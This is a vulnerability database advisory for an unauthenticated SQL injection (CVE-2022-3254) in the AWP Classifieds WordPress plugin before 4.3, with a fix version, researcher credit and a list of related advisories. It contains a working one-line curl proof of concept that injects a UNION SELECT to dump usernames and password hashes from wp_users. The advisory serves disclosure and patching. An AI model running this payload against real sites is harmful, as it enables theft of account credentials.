AWP Classifieds Plugin < 4.3 – Unauthenticated SQLi | CVE 2022-3254 | Plugin Vulnerabilities

Description

The plugin does not properly sanitise and escape some parameters before using them in a SQL statement via an AJAX action available to unauthenticated users and when a specific premium module is active, leading to a SQL injection

Proof of Concept

To read the user_login and user_pass columns from the wp_users table:

curl -i 'https://example.com/wp-admin/admin-ajax.php?action=awpcp-get-regions-options&parent_type=country&context=search&parent=Algeria&type=user_login`+FROM+wp_users+UNION+ALL+SELECT+user_pass+FROM+wp_users;--+-'

Affects Plugins

another-wordpress-classifieds-plugin

Fixed in 4.3

References

CVE

Classification

Type

SQLI

OWASP top 10

CWE

CVSS

Miscellaneous

Original Researcher

cydave

Submitter

cydave

Submitter website

https://cyllective.com/

Submitter twitter

https://twitter.com/cyllective

Verified

Yes

WPVDB ID

546c47c2-5b4b-46db-b754-c6b43aef2660

Timeline

Publicly Published

2022-10-10 (about 3 years ago)

Added

2022-10-10 (about 3 years ago)

Last Updated

2022-10-10 (about 3 years ago)

Other

Published

Title

Published

2025-06-23

Title

Simple Link Directory <= 14.7.3 - Authenticated (Subscriber+) SQL Injection

Published

2021-11-08

Title

WP Data Access < 5.0.0 - Admin+ SQL Injection

Published

2015-04-23

Title

Ultimate Product Catalogue <= 3.1.2 - Unauthenticated SQL Injection

Published

2014-08-01

Title

My Category Order <= 2.8 - SQL Injection

Published

2024-03-28

Title

WP ERP | Complete HR solution with recruitment & job listings | WooCommerce CRM & Accounting <= 1.12.9 - Authenticated (Subscriber+) SQL Injection